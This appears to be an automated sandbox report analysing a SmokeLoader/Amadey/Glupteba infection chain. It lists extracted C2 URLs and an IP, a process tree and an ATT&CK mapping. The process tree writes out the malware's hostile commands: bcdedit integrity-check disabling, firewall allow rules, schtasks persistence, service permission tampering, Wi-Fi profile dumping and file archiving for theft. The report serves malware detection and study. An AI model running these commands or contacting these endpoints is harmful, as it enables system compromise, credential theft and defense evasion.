Analysis

  • max time kernel
    131s
  • max time network
    303s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-03-2024 04:52

General

  • Target

    32d3638794ae9330bc15c097eca82eed247c406c0167f07d3a2eda25781c467d.exe

  • Size

    233KB

  • MD5

    7e0d3e9df670735fddff76b348522603

  • SHA1

    7df4c1d1d194c786ab1b43e27dcbbbfdb28ff98b

  • SHA256

    32d3638794ae9330bc15c097eca82eed247c406c0167f07d3a2eda25781c467d

  • SHA512

    f9a3b7728428cf433d7c4fe046645a08485e22e1be396f1a8e2e552f777cbaa86a746fa5786bbc39509b5f49169bbdb39388b19599cea07ae2a11bc8a246c588

  • SSDEEP

    3072:kY6AS4mA03XTyhHl6DcmJqcfFhW4i6NipK6s3lSyz5hhCZSk:k513DyFl6DcqWH6NipIhJ

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://selebration17io.io/index.php

http://vacantion18ffeu.cc/index.php

http://valarioulinity1.net/index.php

http://buriatiarutuhuob.net/index.php

http://cassiosssionunu.me/index.php

http://sulugilioiu19.net/index.php

http://goodfooggooftool.net/index.php

http://kamsmad.com/tmp/index.php

http://souzhensil.ru/tmp/index.php

http://teplokub.com.ua/tmp/index.php

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 6 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Pitou 5 IoCs

    Pitou.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Windows security bypass 2 TTPs 7 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 50 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\32d3638794ae9330bc15c097eca82eed247c406c0167f07d3a2eda25781c467d.exe
    "C:\Users\Admin\AppData\Local\Temp\32d3638794ae9330bc15c097eca82eed247c406c0167f07d3a2eda25781c467d.exe"
    1⤵
    • DcRat
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:2100
  • C:\Users\Admin\AppData\Local\Temp\B8C4.exe
    C:\Users\Admin\AppData\Local\Temp\B8C4.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Users\Admin\AppData\Local\Temp\B8C4.exe
      C:\Users\Admin\AppData\Local\Temp\B8C4.exe
      2⤵
      • DcRat
      • Executes dropped EXE
      • Adds Run key to start application
      PID:2504
  • C:\Users\Admin\AppData\Local\Temp\BF2B.exe
    C:\Users\Admin\AppData\Local\Temp\BF2B.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious use of FindShellTrayWindow
    PID:2800
  • C:\Users\Admin\AppData\Local\Temp\C2F3.exe
    C:\Users\Admin\AppData\Local\Temp\C2F3.exe
    1⤵
    • Executes dropped EXE
    • Writes to the Master Boot Record (MBR)
    PID:2984
  • C:\Users\Admin\AppData\Local\Temp\E360.exe
    C:\Users\Admin\AppData\Local\Temp\E360.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 124
      2⤵
      • Loads dropped DLL
      • Program crash
      PID:2052
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\EE2A.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\EE2A.dll
      2⤵
      • Loads dropped DLL
      PID:2132
  • C:\Users\Admin\AppData\Local\Temp\F4CF.exe
    C:\Users\Admin\AppData\Local\Temp\F4CF.exe
    1⤵
    • Executes dropped EXE
    PID:844
  • C:\Users\Admin\AppData\Local\Temp\979.exe
    C:\Users\Admin\AppData\Local\Temp\979.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1988
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
        3⤵
        • Loads dropped DLL
        PID:3020
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
          4⤵
          • Loads dropped DLL
          PID:1408
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            5⤵
              PID:1344
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\787592910372_Desktop.zip' -CompressionLevel Optimal
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1220
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
          3⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          PID:1744
    • C:\Users\Admin\AppData\Local\Temp\16D2.exe
      C:\Users\Admin\AppData\Local\Temp\16D2.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1416
    • C:\Users\Admin\AppData\Local\Temp\35B8.exe
      C:\Users\Admin\AppData\Local\Temp\35B8.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe
        "C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"
        2⤵
        • Blocklisted process makes network request
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2260
        • C:\Users\Admin\AppData\Local\Temp\u1qs.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u1qs.0.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          PID:1268
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\u1qs.0.exe" & del "C:\ProgramData\*.dll"" & exit
            4⤵
              PID:2568
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 5
                5⤵
                • Delays execution with timeout.exe
                PID:1408
          • C:\Users\Admin\AppData\Local\Temp\u1qs.1.exe
            "C:\Users\Admin\AppData\Local\Temp\u1qs.1.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:952
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
              4⤵
                PID:2260
                • C:\Windows\SysWOW64\chcp.com
                  chcp 1251
                  5⤵
                    PID:1936
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                    5⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:2724
            • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
              "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:2664
              • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                3⤵
                • DcRat
                • Windows security bypass
                • Executes dropped EXE
                • Loads dropped DLL
                • Windows security modification
                • Adds Run key to start application
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                PID:2880
                • C:\Windows\system32\cmd.exe
                  C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                  4⤵
                    PID:772
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      5⤵
                      • Modifies Windows Firewall
                      • Modifies data under HKEY_USERS
                      PID:2012
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Adds Run key to start application
                    • Manipulates WinMon driver.
                    • Manipulates WinMonFS driver.
                    • Drops file in Windows directory
                    • Modifies data under HKEY_USERS
                    • Modifies system certificate store
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2736
                    • C:\Windows\system32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      5⤵
                      • DcRat
                      • Creates scheduled task(s)
                      PID:1760
                    • C:\Windows\system32\schtasks.exe
                      schtasks /delete /tn ScheduledUpdate /f
                      5⤵
                        PID:2492
                      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Modifies system certificate store
                        PID:2988
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:772
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2560
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:1344
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2840
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2640
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2808
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:1712
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2672
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2548
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:576
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:1920
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -timeout 0
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:1796
                        • C:\Windows\system32\bcdedit.exe
                          C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                          6⤵
                          • Modifies boot configuration data using bcdedit
                          PID:1592
                      • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                        5⤵
                        • Executes dropped EXE
                        PID:1644
                      • C:\Windows\system32\bcdedit.exe
                        C:\Windows\Sysnative\bcdedit.exe /v
                        5⤵
                        • Modifies boot configuration data using bcdedit
                        PID:2956
                      • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                        5⤵
                        • Executes dropped EXE
                        PID:2428
                      • C:\Windows\system32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                        5⤵
                        • DcRat
                        • Creates scheduled task(s)
                        PID:1220
                      • C:\Windows\windefender.exe
                        "C:\Windows\windefender.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:1600
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                          6⤵
                            PID:676
                            • C:\Windows\SysWOW64\sc.exe
                              sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                              7⤵
                              • Launches sc.exe
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1372
                • C:\Users\Admin\AppData\Local\Temp\3F3B.exe
                  C:\Users\Admin\AppData\Local\Temp\3F3B.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2596
                  • C:\Users\Admin\AppData\Local\Temp\is-FRKFL.tmp\3F3B.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-FRKFL.tmp\3F3B.tmp" /SL5="$A0152,1746226,56832,C:\Users\Admin\AppData\Local\Temp\3F3B.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of FindShellTrayWindow
                    PID:2828
                • C:\Windows\system32\makecab.exe
                  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240304045315.log C:\Windows\Logs\CBS\CbsPersist_20240304045315.cab
                  1⤵
                  • Drops file in Windows directory
                  PID:368
                • C:\Windows\windefender.exe
                  C:\Windows\windefender.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2940

                Network

                MITRE ATT&CK Matrix ATT&CK v13

                Execution

                Command and Scripting Interpreter

                1
                T1059

                Scheduled Task/Job

                1
                T1053

                Persistence

                Create or Modify System Process

                1
                T1543

                Windows Service

                1
                T1543.003

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Pre-OS Boot

                1
                T1542

                Bootkit

                1
                T1542.003

                Scheduled Task/Job

                1
                T1053

                Privilege Escalation

                Create or Modify System Process

                1
                T1543

                Windows Service

                1
                T1543.003

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Scheduled Task/Job

                1
                T1053

                Defense Evasion

                Impair Defenses

                4
                T1562

                Disable or Modify Tools

                2
                T1562.001

                Disable or Modify System Firewall

                1
                T1562.004

                Modify Registry

                4
                T1112

                Virtualization/Sandbox Evasion

                2
                T1497

                Pre-OS Boot

                1
                T1542

                Bootkit

                1
                T1542.003

                Subvert Trust Controls

                1
                T1553

                Install Root Certificate

                1
                T1553.004

                Credential Access

                Unsecured Credentials

                5
                T1552

                Credentials In Files

                4
                T1552.001

                Credentials in Registry

                1
                T1552.002

                Discovery

                Query Registry

                7
                T1012

                Virtualization/Sandbox Evasion

                2
                T1497

                System Information Discovery

                5
                T1082

                Peripheral Device Discovery

                1
                T1120

                Collection

                Data from Local System

                5
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                  Filesize

                  67KB

                  MD5

                  753df6889fd7410a2e9fe333da83a429

                  SHA1

                  3c425f16e8267186061dd48ac1c77c122962456e

                  SHA256

                  b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

                  SHA512

                  9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

                • C:\Users\Admin\AppData\Local\Temp\16D2.exe
                  Filesize

                  232KB

                  MD5

                  224f63c213ef6ae7688e56bde6083df6

                  SHA1

                  66bf0a02196acc02251fc78402c9ad7c93d2f2d2

                  SHA256

                  6e17bff8b977c77f948c069260b7163713257d0dc77ed11ad4a9228297dcb73e

                  SHA512

                  7d93acbca3d778c3bdbf0976e44224e930d2166a52ab703235b382f4781d9d9fbe924b5a82e028b497fb41de049daa9a9d53d92f52c7c28ba33782d606892afd

                • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                  Filesize

                  2.1MB

                  MD5

                  4cc5b5b832d01a1eda63eb278acdc55d

                  SHA1

                  188c3bc194eec65a7a1f733a32bd2272c1102381

                  SHA256

                  4e5c1a10ec25596a6f5fce5db2bab9c2a9064be14b4eef280428acfc9fd81234

                  SHA512

                  ad19dfa3c37f8a36eea7538e441eaeadb117289433ced20f68dd40261a45958536c82392dc985ad09271525501fa85fa6e0032d3b4e9f40a6a228a6d51d07f6c

                • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                  Filesize

                  469KB

                  MD5

                  1fa871de3a6e1a1249221794932c65de

                  SHA1

                  df91bf853ab48a25e7360dde441bcaddf6247875

                  SHA256

                  d2164b2a9f7c261fc529e0e217dc93bf5171cfabba2871bae5ce212e7829dd4c

                  SHA512

                  b1ce33e0cba412a1384b6aa322a3090eee1fc927c32fc259cc2b5221870c6906e0bbff845bae3b5ca5f3c1d7b36a5a7986d0b08adfa57078bf7c2d2d3aa6e155

                • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                  Filesize

                  4.1MB

                  MD5

                  0c7b8daa9b09bcdf947a020bf28c2f19

                  SHA1

                  738f89f4da5256d14fe11394cf79e42060a7e98b

                  SHA256

                  ff0c709f06a8850794f2501c7dc9ce4ffc75f1ab3039218952cd87a067d3d3ff

                  SHA512

                  b069ef6d30a5afafc4b4e2632cb4f9da65e58dcedb66706921d85a6be97a024c1e786ec51299ba52668a65fe948d499609aa2b4978fb20738dd0b643d84cbcf6

                • C:\Users\Admin\AppData\Local\Temp\35B8.exe
                  Filesize

                  4.5MB

                  MD5

                  2c7078b90caee9d791dd338c2441ca32

                  SHA1

                  56901d99127fd701353ab7c68e66c94c49eb507c

                  SHA256

                  8ad20c4b4c312feb468a58d1748c0d7abba3dd2d0fb8e6bfbee837c47a0e8c5a

                  SHA512

                  000d81908bc2df1f09fcbf0ac50c72079064923f23fbea2ee0868590eaf693dff4246bb0090083aaec6f031b11353147393b710f72cd1e3630c2ecd071401ef6

                • C:\Users\Admin\AppData\Local\Temp\35B8.exe
                  Filesize

                  2.6MB

                  MD5

                  2f112ef14befd3e9cddd8bfa3b0cfea7

                  SHA1

                  a36865a04ddc8a948e109b5a976bf0636baad175

                  SHA256

                  3723faeaa83f10d93b8595d3b1d4367fa598838308cf7433836f4f52d7c2a88a

                  SHA512

                  cb36997d2f08fafb5a64c401e7892d76e690a79b3e62f46917be296756793f9a01ca3a32154b1faba43c63b24b8c320330118147492e2ee42b6e5d96bec0ec4f

                • C:\Users\Admin\AppData\Local\Temp\3F3B.exe
                  Filesize

                  576KB

                  MD5

                  951fa855869f67eccb16390e804228f5

                  SHA1

                  3c37a7518d934f21ee4ce399433fd94b61783421

                  SHA256

                  51b6bcd20661dcb8438eb64f948771d013354716cadf5b0dbe88300d8edf33d4

                  SHA512

                  0cea11f07b9b3d273d6ed739125b4cfd006ac197fd258b23557c5e72776109187aa27ab1d6f91a5b51bc666e53ea4712384b4e70e8908e61347a2a184f8fb303

                • C:\Users\Admin\AppData\Local\Temp\3F3B.exe
                  Filesize

                  448KB

                  MD5

                  6aa6330d8c772b85882a72a0057879fd

                  SHA1

                  d297fe019b118c032f82f4ad88ce1b39b0e69296

                  SHA256

                  718687a060ad621e6c3bcd8f758524bdb33a1825b2d5507bd07668bcb11e622a

                  SHA512

                  5ccc50b91e2ba14acf256383fd7cc0e6f38964f8adf884f7769a5735712872401469444a347c1c1c69c24509e2f3bc948e11c909f4ce10c9f51bb323445bc9d1

                • C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp
                  Filesize

                  2.6MB

                  MD5

                  e6da188602c964ce4d406a3a93a4c2d9

                  SHA1

                  bbd7fcdc38f3a29c372bbcf41e2a590ff9eac3d1

                  SHA256

                  330a7b523ad57ad797fc522f02cd1de4df499830c8eb1ec792fe5d72c3fbb6ec

                  SHA512

                  4c5436ce1bedc1037dfb87b26c93771e883db2280f5437c37d683dc0a3e1373191a1043695df73bcd1c149c91d2842e0936a5715549cce0b4aed887dbf687376

                • C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
                  Filesize

                  6.5MB

                  MD5

                  81c0d12c7fe2a74a957b790f3423994f

                  SHA1

                  d4e9978af39349234bac349ff886676cf778307d

                  SHA256

                  8abd194501f46f06d9f80e4a410898fc2acc2d475c43756769e5ebc03f615fb9

                  SHA512

                  7ad8bf3a659aa02a277d7f48628e5008ec56e7a8da02299f65d7816de2440f05d216d619cc870733a591657db2844ef43d1f62f61f8ed4a62dafbea027252a60

                • C:\Users\Admin\AppData\Local\Temp\B8C4.exe
                  Filesize

                  1.8MB

                  MD5

                  24001c12fe58e9b0d169eb051103a0cb

                  SHA1

                  64b2d574a0986f9d3f1333cd830f22f1ffcfa3fc

                  SHA256

                  f658abefc53e5fa3209378bcdaad75933c355a2f063cd0ed15c8bcdaea5da542

                  SHA512

                  26b210d0da5808dd61af4a48e0ea79e96c5c08fba4205a510b9489a698c3d0d59610deacba23b8c89a9927093e510c89fe3fc5c9254451bba7c15a24871f3b6b

                • C:\Users\Admin\AppData\Local\Temp\B8C4.exe
                  Filesize

                  448KB

                  MD5

                  cc263c0ccee25515370523c385e3fd4d

                  SHA1

                  133c7d904dbd9e2bb5236b3ebb6b00c8c5bc13c4

                  SHA256

                  2ee50d453963760f2816edfe70b1ee1d1f59e1f4cad129224fb41564baa73c4e

                  SHA512

                  9065d25cc605fe333596eb479cf86ea430dc8c1a160b4418a879fd7dbe7eb1078d5701df8d4c1f84632b6a514e2c6eb3d9a8dc1059a4bd98ee3cf7e850ea9f8b

                • C:\Users\Admin\AppData\Local\Temp\B8C4.exe
                  Filesize

                  1.5MB

                  MD5

                  a4954c77e78f3da8fc9639113e86f731

                  SHA1

                  e0987555438f7d6f636f4b4b8e23618191ba207d

                  SHA256

                  00d0fac981147eb331d360b2516504f9b31943509f1e10aa9e46059465c7bf31

                  SHA512

                  fbaa806f83554274d9566498365a04f909b25cfb8d4afcd14e3d9c49844e2ecdd1f5bfe466ecdd09cb953ca1f206d954209098856a10be4d2ebc25e5e525737d

                • C:\Users\Admin\AppData\Local\Temp\BF2B.exe
                  Filesize

                  1.8MB

                  MD5

                  a14f89b98eaa6d94dd52a019eb0ba9c2

                  SHA1

                  7091e5fce581ef94ec690a575f4290c0c6b9dc10

                  SHA256

                  3550241ffdaf4bf08b58ae6f930ddd9ff8dd6d945c682d7f2fdf4a6b80e2810e

                  SHA512

                  3f29e0d81ae430f616b1715a4a31b800837989cbee251e7e69ed6e91d0f015e5273c4cb6c94950019d41c3826203272c5cb7a6c34e7653d1f267d02e43baac1c

                • C:\Users\Admin\AppData\Local\Temp\C2F3.exe
                  Filesize

                  554KB

                  MD5

                  a1b5ee1b9649ab629a7ac257e2392f8d

                  SHA1

                  dc1b14b6d57589440fb3021c9e06a3e3191968dc

                  SHA256

                  2bfd95260a4c52d4474cd51e74469fc3de94caed28937ff0ce99ded66af97e65

                  SHA512

                  50ccbb9fd4ea2da847c6be5988e1e82e28d551b06cc9122b921dbd40eff4b657a81a010cea76f29e88fda06f8c053090b38d04eb89a6d63ec4f42ef68b1cf82b

